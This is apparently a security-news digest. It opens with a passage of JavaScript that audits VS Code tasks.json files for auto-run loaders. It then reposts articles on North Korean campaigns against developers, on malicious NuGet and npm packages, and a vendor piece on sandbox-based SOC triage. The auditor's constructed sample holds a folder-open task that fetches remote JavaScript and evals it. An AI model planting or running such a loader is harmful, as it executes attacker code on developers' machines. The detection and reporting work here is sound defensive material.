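function auditTasksJson(text) {
  const doc = parseJsonc(text);
  const findings = [];
  for (const task of doc.tasks || []) {
    const autoRun = task.runOptions?.runOn === "folderOpen";
    const line = commandLine(task);
    const reasons = LOADER_PATTERNS.filter(([re]) => re.test(line)).map(([, why]) => why);
    if (!autoRun && reasons.length === 0) continue;          // ordinary build/lint task
    const severity = autoRun && reasons.length ? "high"      // runs on open and fetches code
                   : autoRun ? "medium"                      // runs on open; review by hand
                   : "low";                                  // needs a click, but still fetches code
    findings.push({ label: task.label, autoRun, reasons, severity, commandLine: line });
  }
  return findings;
}

// Constructed sample in the shape the article describes: a hidden task,
// auto-started on folder open, that pulls JavaScript at runtime and evals it.
const SAMPLE_TASKS_JSON = `{
  // Workspace tasks (constructed example)
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Prepare dev environment",
      "type": "shell",
      "command": "node",
      "args": ["-e", "fetch('https://loader.example.invalid/init.js').then(r=>r.text()).then(eval)"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    { "label": "lint", "type": "npm", "script": "lint" }
  ]
}`;

// Constructed benign file for comparison: nothing auto-runs, nothing is fetched.
const BENIGN_TASKS_JSON = `{"version":"2.0.0","tasks":[{"label":"build","type":"shell","command":"npm","args":["run","build"]}]}`;

for (const f of auditTasksJson(SAMPLE_TASKS_JSON))
  console.log(`[${f.severity}] ${f.label}: ${f.reasons.join(", ")} :: ${f.commandLine}`);
```

    On a real checkout, pass the file contents in with `auditTasksJson(fs.readFileSync(".vscode/tasks.json", "utf8"))` before opening the folder in VS Code, and treat any "high" finding as a reason not to trust the workspace. The heuristics are deliberately broad; a "medium" task still deserves a manual look, since a folderOpen task can launch a seemingly local script that does the fetching one hop later.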

    Developer Attacks Rage On

    North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021, when security researchers uncovered the Dream Jobs campaign, which sent fake job offers linking to malicious Web files. That campaign evolved into more sophisticated socially engineered attacks in which developers were lured into participating in fake development projects or recruitment challenges that delivered spyware and other malware. 


    The latest discovery of weaponized Next.js repositories illustrates threat actors’ commitment to targeting developers not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, security operations teams and DevSecOps leaders “should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs,” according to Microsoft.

    Organizations can do this by enforcing strict trust policies for IDEs like Visual Studio Code; deploying attack surface reduction rules via Microsoft Defender for Endpoint to constrain risky script execution behaviors; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.


    Source: www.darkreading.com…

  • Malicious NuGet Packages Stole ASP.NET Data; npm Package Dropped Malware


    Ravie LakshmananFeb 25, 2026Cybersecurity / Malware


    Cybersecurity researchers have discovered four malicious NuGet packages that are designed to target ASP.NET web application developers to steal sensitive data.

    The campaign, discovered by Socket, exfiltrates ASP.NET Identity data, including user accounts, role assignments, and permission mappings, as well as manipulates authorization rules to create persistent backdoors in victim applications.

    The names of the packages are listed below –

    • NCryptYo
    • DOMOAuth2_
    • IRAOAuth2.0
    • SimpleWriter_

    The NuGet packages were published to the repository between August 12 and 21, 2024, by a user named hamzazaheer. They have since been taken down from the repository following responsible disclosure, but not before attracting more than 4,500 downloads.

    According to the software supply chain security company, NCryptYo acts as a first-stage dropper that establishes a local proxy on localhost:7152 that relays traffic to an attacker-controlled command-and-control (C2) server whose address is dynamically retrieved at runtime. It’s worth noting that NCryptYo attempts to masquerade as the legitimate NCrypto package.

    DOMOAuth2_ and IRAOAuth2.0 steal Identity data and backdoor apps, while SimpleWriter_ features unconditional file writing and hidden process execution capabilities while presenting itself as a PDF conversion utility. An analysis of package metadata has revealed identical build environments, indicating that the campaign is the work of a single threat actor.

    “NCryptYo is a stage-1 execution-on-load dropper,” security researcher Kush Pandya said. “When the assembly loads, its static constructor installs JIT compiler hooks that decrypt embedded payloads and deploy a stage-2 binary – a localhost proxy on port 7152 that relays traffic between the companion packages and the attacker’s external C2 server, whose address is resolved dynamically at runtime.”

    Once the proxy is active, DOMOAuth2_ and IRAOAuth2.0 begin transmitting the ASP.NET Identity data through the local proxy to the external infrastructure. The C2 server responds with authorization rules that the application then processes, creating a persistent backdoor by granting the attacker admin roles, modifying access controls, or disabling security checks. SimpleWriter_, for its part, writes threat actor-controlled content to disk and executes the dropped binary with hidden windows.


    It’s not exactly clear how users are tricked into downloading these packages, as the attack chain kicks in only after all four of them are installed.

    “The campaign’s objective is not to compromise the developer’s machine directly, but to compromise the applications they build,” Pandya explained. “By controlling the authorization layer during development, the threat actor gains access to deployed production applications.”

    “When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules. The threat actor or a buyer can then grant themselves admin-level access to any deployed instance.”

    The disclosure comes as Tenable detailed a malicious npm package named ambar-src that amassed more than 50,000 downloads before it was removed from the JavaScript registry. It was uploaded to npm on February 13, 2026.

    The package makes use of npm’s preinstall script hook to execute the malicious code contained in index.js during installation, before anything from the package is ever imported by the developer’s project. The malware runs a one-liner command that obtains different payloads from the domain “x-ya[.]ru” based on the operating system –

    • On Windows, it downloads and executes a file called msinit.exe containing encrypted shellcode, which is decoded and loaded into memory.
    • On Linux, it fetches a bash script and executes it. The bash script then retrieves another payload from the same server, an ELF binary that works as an SSH-based reverse shell client.
    • On macOS, it fetches another script that uses osascript to run JavaScript responsible for dropping Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework that can conduct reconnaissance, collect screenshots, steal data from Google Chrome, and capture system passwords by displaying a fake prompt.

    “It employs multiple techniques to evade detection, and drops open-source malware with advanced capabilities, targeting developers on Windows, Linux, and macOS hosts,” the company said.

    Once the data is collected, it’s exfiltrated to an attacker-controlled Yandex Cloud domain in an effort to blend in with legitimate traffic and take advantage of the fact that trusted services are less likely to be blocked within corporate networks.

    Ambar-src is assessed to be a more mature variant of eslint-verify-plugin, another rogue npm package that was recently flagged by JFrog as dropping Mythic agents Poseidon and Apfell on Linux and macOS systems.

    “If this package is installed or running on a computer, that system must be considered fully compromised,” Tenable said. “While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software.”


    Source: thehackernews.com…

  • Top 5 Ways Broken Triage Increases Business Risk Instead of Reducing It


    Triage is supposed to make things simpler. In a lot of teams, it does the opposite.

    When you can’t reach a confident verdict early, alerts turn into repeat checks, back-and-forth, and “just escalate it” calls. That cost doesn’t stay inside the SOC; it shows up as missed SLAs, higher cost per case, and more room for real threats to slip through.

    So where does triage go wrong? Here are five triage issues that turn investigations into expensive guesswork, and how top teams are changing the outcome with execution evidence.

    1. Decisions Made Without Real Evidence

    Business risk: The hardest triage failure to notice is when decisions get made before proof exists. If responders rely on partial signals (labels, hash matches, reputation), they end up approving or escalating cases without seeing what the file or link actually does. 

    That uncertainty fuels false positives, missed real threats, slower containment, and higher cost per case, while giving attackers more time before anyone has confidence in the verdict.

    The Fix: Get Execution Evidence Early

    High-performing teams reduce this risk by validating behavior at triage, not later. Sandboxes make that practical by showing real execution: process activity, network calls, persistence, and the full attack chain. 

    For example, with ANY.RUN’s interactive sandbox, teams report that in ~90% of cases, they can see the full attack chain within ~60 seconds, turning unclear alerts into evidence-backed decisions early in the workflow.


    Full attack chain with fake Microsoft login page revealed inside ANY.RUN sandbox in less than a minute

    In this real-world hybrid phishing scenario combining Tycoon 2FA and Salty 2FA, most traditional controls failed to detect the threat because the attack blended multiple kits and evasive redirects. Inside an interactive sandbox, however, the full malicious flow and a clear verdict appeared in just 35 seconds.

    Improve triage speed and certainty to cut MTTR by up to 21 minutes per case, control escalation costs, and limit real business exposure.


    Business outcomes:

    • Faster, evidence-backed verdicts at triage
    • Lower cost per case by reducing rework
    • Fewer missed threats caused by “unclear” closures

    2. Triage Quality Depends on Analyst Seniority

    Business risk: In many SOCs, the outcome of triage depends on who touches the alert. Senior staff close faster because they recognize patterns; junior staff escalate because they don’t have enough confidence or context. The result is inconsistent verdicts, uneven response speed, and a workflow that doesn’t scale cleanly as alert volume grows.

    The Fix: Make Triage Repeatable for Every Shift

    Top teams reduce this gap by designing triage around shared evidence and repeatable steps, not personal experience. The goal is simple: give Tier 1 enough clarity to reach the same conclusion a senior responder would, using the same observable facts.

    Auto-generated report for easy sharing between team members

    With ANY.RUN, teams can share the same sandbox session and findings through built-in teamwork features, so knowledge doesn’t stay in one person’s head. That consistency helps reduce “escalate to be safe” behavior and keeps triage outcomes stable across shifts.

    Business outcomes:

    • Consistent triage across shifts
    • Fewer senior reviews
    • More predictable SLAs

    3. Triage Delays Give Attackers More Time

    Business risk: Even when a threat is detected, triage can take too long to confirm what’s happening. Manual checks and queued escalations delay action, extending dwell time and giving attackers room to move laterally or exfiltrate data. The business impact shows up as missed SLAs and higher incident costs.

    The Fix: Shrink Time-to-Decision at Triage

    High-performing teams treat triage as a speed problem: reduce the steps between detection and a defensible verdict. That means confirming behavior immediately, before the case bounces between queues or turns into a long validation loop.

    Full visibility into the attack revealed in 35 seconds inside ANY.RUN’s cloud sandbox

    With the interactive sandbox, suspicious files and URLs can be detonated quickly, and the full attack chain often becomes visible in under a minute. Operational results often show up to 21 minutes shaved off MTTR per case, because teams spend less time waiting, re-checking, and escalating just to confirm what’s happening.

    Business outcomes:

    • Earlier confirmation, shorter dwell time
    • Fewer SLA misses under load
    • Smaller incident impact

    4. Over-Escalation Hides Real Priority Incidents

    Business risk: When evidence is unclear, Tier 1 escalates “just to be safe,” and Tier 2 becomes a verification layer for borderline cases. That clogs queues, pulls senior time into “maybes,” and slows response to high-impact incidents, increasing cost per investigation and raising the risk that critical cases wait too long.

    The Fix: Close More Cases at Tier 1 with Execution Evidence

    When Tier 1 can prove or dismiss alerts independently, Tier 2 stays focused on real incidents instead of acting as a verification desk.

    With solutions like ANY.RUN, that becomes realistic because the sandbox is built for fast triage: it’s intuitive to use, provides AI-assisted guidance during analysis, and generates auto-built reports that capture the key evidence without extra manual write-ups. A dedicated IOCs tab also pulls indicators into one place, so Tier 1 can escalate with context rather than escalating for confirmation. 

    AI assisted guidance showcased in ANY.RUN’s sandbox

    This is how teams see up to a 30% reduction in Tier-1 → Tier-2 escalations, preserving senior capacity for high-risk threats.

    Business outcomes:

    • Less Tier 2 overload
    • Faster queues
    • Lower escalation volume

    5. Manual Work Limits Scale and Increases Error

    Business risk: A lot of triage is still repetitive manual work: following redirect chains, getting past CAPTCHAs, or extracting the hidden links in QR codes. As volume grows, this limits throughput, increases mistakes, and triggers unnecessary escalation simply because teams run out of time.

    The Fix: Reduce Manual Steps with Interactive Automation

    Modern sandbox environments combine automation with human-like interactivity, so that suspicious content can be opened safely, redirect flows followed, and obstacles such as CAPTCHAs or QR-embedded links handled automatically during analysis.

    Malicious PDF with a QR code: ANY.RUN extracts and opens the embedded link automatically, revealing the next stage of the attack

    With ANY.RUN’s interactive sandbox, these routine triage actions are performed inside the controlled environment, exposing hidden malicious behavior while removing repetitive work from responders. In day-to-day operations, teams often see up to a 20% decrease in Tier 1 workload, along with fewer escalations and more time available for high-value investigation. 

    Business outcomes:

    • More Tier 1 capacity
    • Fewer manual errors
    • More time for confirmed threats

    Reduce Business Risk by Fixing Triage First

    Broken triage rarely looks dramatic. Instead, it quietly slows response, increases escalation pressure, and keeps real threats open longer than the business can afford.

    Teams that shift to evidence-driven, execution-based triage consistently report measurable gains, including:

    • Up to 3× improvement in overall SOC efficiency
    • 94% of users reported faster triage and clearer verdicts
    • Up to 58% more threats identified across investigations

    Improving speed, certainty, and scalability at the triage stage is one of the fastest ways to reduce MTTR, control operational cost, and cut real business exposure.


    This article is a contributed piece from one of The Hacker News’ partners.


    Source: thehackernews.com…